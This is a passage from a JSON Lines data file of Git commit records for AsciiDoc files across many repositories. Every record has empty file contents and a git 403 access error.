403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e16595abe1a7faeb0edb371b926b8d281cd41096","subject":"Removed open issue from 2.1.1 release notes","message":"Removed open issue from 2.1.1 release notes\n","repos":"strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test","old_file":"docs\/reference\/release-notes\/2.1.1.asciidoc","new_file":"docs\/reference\/release-notes\/2.1.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca605fafc2c63695944267b25f4e2ca880b1c14a","subject":"notes on upgrading python packages","message":"notes on upgrading python packages\n","repos":"ccheetham\/home,ccheetham\/home,ccheetham\/home","old_file":"etc\/python\/README.adoc","new_file":"etc\/python\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ccheetham\/home.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3101117efb232d1a46aea350c86b299f9c86f5e8","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a44fba70941c72ab20624183e3092be4b9744ac8","subject":"added todo","message":"added todo\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines","old_file":"docs\/INTRO.adoc","new_file":"docs\/INTRO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"323bfbbdd6bb12610adeae71c0bfa645b74a09aa","subject":"Added wiretap EIP docs","message":"Added wiretap EIP docs\n","repos":"anoordover\/camel,curso007\/camel,jonmcewen\/camel,pmoerenhout\/camel,curso007\/camel,sverkera\/camel,gnodet\/camel,apache\/camel,dmvolod\/camel,adessaigne\/camel,snurmine\/camel,tadayosi\/camel,alvinkwekel\/camel,mcollovati\/camel,CodeSmell\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,tdiesler\/camel,davidkarlsen\/camel,kevinearls\/camel,DariusX\/camel,Fabryprog\/camel,sverkera\/camel,christophd\/camel,tdiesler\/camel,akhettar\/camel,onders86\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,alvinkwekel\/camel,objectiser\/camel,akhettar\/camel,cunningt\/camel,kevinearls\/camel,isavin\/camel,curso007\/camel,apache\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,tdiesler\/camel,isavin\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,adessaigne\/camel,zregvart\/camel,cunningt\/camel,gautric\/camel,sverkera\/camel,rmarting\/camel,isavin\/camel,ullgren\/camel,alvinkwekel\/camel,rmarting\/camel,gnodet\/camel,onders86\/camel,pmoerenhout\/camel,rmarting\/camel,adessaigne\/camel,onders86\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,adessaigne\/camel,zregvart\/camel,mcollovati\/camel,gautric\/camel,jamesnetherton\/camel,pax95\/camel,onders86\/camel,christophd\/camel,snurmine\/camel,nikhilvibhav\/camel,mcollovati\/camel,CodeSmell\/camel,curso007\/camel,gnodet\/camel,gautric\/camel,apache\/camel,ullgren\/camel,curso007\/camel,adessaigne\/camel,sverkera\/camel,tadayosi\/camel,pmoerenhout\/camel,gautric\/camel,jamesnetherton\/camel,CodeSmell\/camel,ullgren\/camel,onders86\/camel,pmoerenhout\/camel,CodeSmell\/camel,rmarting\/camel,adessaigne\/camel,isavin\/camel,jonmcewen\/camel,sverkera\/camel,dmvolod\/camel,anoordover\/camel,sverkera\/camel,gautric\/camel,onders86\/camel,pmoerenhout\/camel,jonmcewen\/camel,Fabryprog\/camel,ullgren\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,gnodet\/camel,dmvolod\/camel,snurmine\/camel,akhettar\/camel,dmvolod\/camel,snurmine\/camel,cunningt\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,nicolaferraro\/camel,akhettar\/camel,rmarting\/camel,zregvart\/camel,gnodet\/camel,isavin\/camel,jamesnetherton\/camel,curso007\/camel,objectiser\/camel,anoordover\/camel,anoordover\/camel,nikhilvibhav\/camel,DariusX\/camel,davidkarlsen\/camel,apache\/camel,jonmcewen\/camel,anoordover\/camel,tdiesler\/camel,cunningt\/camel,punkhorn\/camel-upstream,dmvolod\/camel,Fabryprog\/camel,dmvolod\/camel,christophd\/camel,jamesnetherton\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,nicolaferraro\/camel,kevinearls\/camel,tadayosi\/camel,akhettar\/camel,Fabryprog\/camel,anoordover\/camel,apache\/camel,jonmcewen\/camel,gautric\/camel,objectiser\/camel,pax95\/camel,snurmine\/camel,tadayosi\/camel,akhettar\/camel,kevinearls\/camel,christophd\/camel,kevinearls\/camel,jamesnetherton\/camel,kevinearls\/camel,alvinkwekel\/camel,cunningt\/camel,nikhilvibhav\/camel,jonmcewen\/camel,objectiser\/camel,nicolaferraro\/camel,nicolaferraro\/camel,DariusX\/camel,snurmine\/camel,isavin\/camel,rmarting\/camel,pax95\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/wireTap-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/wireTap-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e885bd1abfe280b28eb76c0dd6c28d35d0d56345","subject":"Update 2016-11-12-Hacking-News-121116.adoc","message":"Update 2016-11-12-Hacking-News-121116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-12-Hacking-News-121116.adoc","new_file":"_posts\/2016-11-12-Hacking-News-121116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3478418695617dafd9627ea3f61196619b67ac20","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73120b1ed6629f729e412eebf08ca0659bf47c86","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5663e794978d7257bc6530f816c82dffdcd95764","subject":"Update 2015-10-04-Lets-talk-about-mitigation.adoc","message":"Update 2015-10-04-Lets-talk-about-mitigation.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-10-04-Lets-talk-about-mitigation.adoc","new_file":"_posts\/2015-10-04-Lets-talk-about-mitigation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c04bee882a8e7b19dc4fba7b73abd92d0fd011d","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e3a5aad726f49de1cf9ea0a0d2bc9cbd7a68435","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f714d120a77157ff546dc34b9aaf9b4f5cd45969","subject":"Update 2011-07-08-Elte-Heart.adoc","message":"Update 2011-07-08-Elte-Heart.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-07-08-Elte-Heart.adoc","new_file":"_posts\/2011-07-08-Elte-Heart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcebe5f01c52915e71ce5f135e88a351027126b8","subject":"Apicurio blogpost","message":"Apicurio blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-04-09-debezium-apicurio-registry.adoc","new_file":"blog\/2020-04-09-debezium-apicurio-registry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"625095d1c38b2e1b2d2019a0bf357e7fbea6d75a","subject":"Update 2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","message":"Update 2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","new_file":"_posts\/2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66a9d9fc7495a60a4191d207dd24c75061592e68","subject":"new post","message":"new post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-07-sneak-preview.adoc","new_file":"content\/news\/2017-07-07-sneak-preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8f7ab122a01c76ca7aab4934c705b1fa36ae8c9a","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_space_exploration.adoc","new_file":"content\/writings\/on_space_exploration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"69a3d80a7fca0597f04324a3ffa03353c7fe0e20","subject":"Update 2016-04-23-Battle-Fatigue.adoc","message":"Update 2016-04-23-Battle-Fatigue.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-04-23-Battle-Fatigue.adoc","new_file":"_posts\/2016-04-23-Battle-Fatigue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f868ac355126a304da2ae78fd64c02cc983ec279","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"019b494271b38ebcf9c51f32f64783b9ccf96aac","subject":"notes was added","message":"notes was added\n","repos":"iDoka\/eda-scripts,iDoka\/eda-scripts","old_file":"scratch.adoc","new_file":"scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iDoka\/eda-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a3ed96024a7c71ace29d9fececdfd148332a6cf","subject":"Add basic README to docker-dist module","message":"Add basic README to docker-dist module\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1eba8da8def3f80f4d17501d3c20c42dd87017f","subject":"Update readme","message":"Update readme\n","repos":"asciidocfx\/asciidoctor.js-reveal-demo,asciidocfx\/asciidoctor.js-reveal-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidocfx\/asciidoctor.js-reveal-demo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d66973fc4a5ef41b40858f79fad9b20695163218","subject":"Update OS X details in README","message":"Update OS X details in README\n\nChange-Id: I75cea555b4d7ab44b9272d03726ed3431f7d9c83\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1049\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4225f319b7eaf53ad6489cd4e6a064c48a5e2793","subject":"Add root readme","message":"Add root readme\n","repos":"vjuranek\/infinispan-snippets,vjuranek\/infinispan-snippets,vjuranek\/infinispan-snippets,vjuranek\/infinispan-snippets","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vjuranek\/infinispan-snippets.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d787d69ff99552ff7878c32ea2fad45f7ee53dc5","subject":"add README","message":"add README\n","repos":"pkleimann\/livingdoc,testIT-LivingDoc\/livingdoc2,LivingDoc\/livingdoc,bitterblue\/livingdoc2,LivingDoc\/livingdoc,bitterblue\/livingdoc2,pkleimann\/livingdoc2,LivingDoc\/livingdoc,Drakojin\/livingdoc2,pkleimann\/livingdoc2,Drakojin\/livingdoc2,pkleimann\/livingdoc,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,pkleimann\/livingdoc,Drakojin\/livingdoc2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d843fc0ea9904116796e899fd6b6ed86134c444","subject":"Create README.adoc","message":"Create README.adoc","repos":"igagis\/prorab,igagis\/prorab","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/prorab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d96cceea2457250548b22d2d4a941475130e6507","subject":"Small readme for using this stuff.","message":"Small readme for using this stuff.\n","repos":"sudiamanj\/TuneJar","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sudiamanj\/TuneJar.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1093057be16f9bf0816823441c7bd55bc90f8fd","subject":"adding version used for testing workshop","message":"adding version used for testing workshop\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce81cdd9eeb9458ebc7bc7bdf3db82af5bab691c","subject":"y2b create post WTF IS A DARKVOICE?","message":"y2b create post WTF IS A DARKVOICE?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-13-WTF-IS-A-DARKVOICE.adoc","new_file":"_posts\/2014-05-13-WTF-IS-A-DARKVOICE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57310d7d86be6aae957c14ace6252b0abec13779","subject":"Update 2015-07-12-Meet-the-Team-Gina.adoc","message":"Update 2015-07-12-Meet-the-Team-Gina.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-12-Meet-the-Team-Gina.adoc","new_file":"_posts\/2015-07-12-Meet-the-Team-Gina.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eb30847fe26eda35c9e8eeaedd3bca5c6e15687","subject":"Update 2019-05-22-Picture-In-Picture-API.adoc","message":"Update 2019-05-22-Picture-In-Picture-API.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2019-05-22-Picture-In-Picture-API.adoc","new_file":"_posts\/2019-05-22-Picture-In-Picture-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cbac1fae407b5de5ab72fda702f58bb7eedeb7e","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31e514ac00b70afe43706156ca8f2220d9ee7a9","subject":"agent now uses non-camel-case naming convention","message":"agent now uses non-camel-case naming convention","repos":"hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a654fc12dea79d8fb49128451a527f91bca6f00","subject":"Update 2015-02-10-Blog-Title-2.adoc","message":"Update 2015-02-10-Blog-Title-2.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a9ab2fcab00611c7b5f579f1dc9bea08b5596d6","subject":"1.1.0.CR1 announcement","message":"1.1.0.CR1 announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-13-debezium-1-1-c1-released.adoc","new_file":"blog\/2020-03-13-debezium-1-1-c1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62311a2480fcd3625181683270c600e84ecff9a6","subject":"Update 2016-10-19-algo-1517.adoc","message":"Update 2016-10-19-algo-1517.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-19-algo-1517.adoc","new_file":"_posts\/2016-10-19-algo-1517.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b7e8e5ecf9599c4e0f6d47e06859750bc7f857","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c206a3558a4450af4ccc220a689d2005ed4ba16","subject":"Release notes update","message":"Release notes update\n","repos":"mehtabsinghmann\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"RELEASENOTES.adoc","new_file":"RELEASENOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a77b0895043563b4a9ce136012b1f98d8457b7fd","subject":"Added documentation for the resources module.","message":"Added documentation for the resources module.\n","repos":"marschall\/incubator-tamaya,syzer\/incubator-tamaya,apache\/incubator-tamaya,salyh\/incubator-tamaya,salyh\/incubator-tamaya,salyh\/incubator-tamaya,syzer\/incubator-tamaya,apache\/incubator-tamaya,marschall\/incubator-tamaya,apache\/incubator-tamaya,syzer\/incubator-tamaya,marschall\/incubator-tamaya","old_file":"docs\/mod_resources.adoc","new_file":"docs\/mod_resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marschall\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f047aeb011bc7cddaabb628ea68e9aef2a050be3","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaefa866740984f5db3da8dbd52d3d3b2cb52ecf","subject":"script stage documentation","message":"script stage documentation","repos":"spinnaker\/gate,cfieber\/gate,cfieber\/gate,spinnaker\/gate,spinnaker\/gate,cfieber\/gate","old_file":"gate-manual\/src\/asciidoc\/scriptStage.adoc","new_file":"gate-manual\/src\/asciidoc\/scriptStage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfieber\/gate.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"222b6b3bdddb61ccad0224d02e436dc28191a885","subject":"Update CHANGELOG.adoc","message":"Update CHANGELOG.adoc\n\nAdd changes for the version 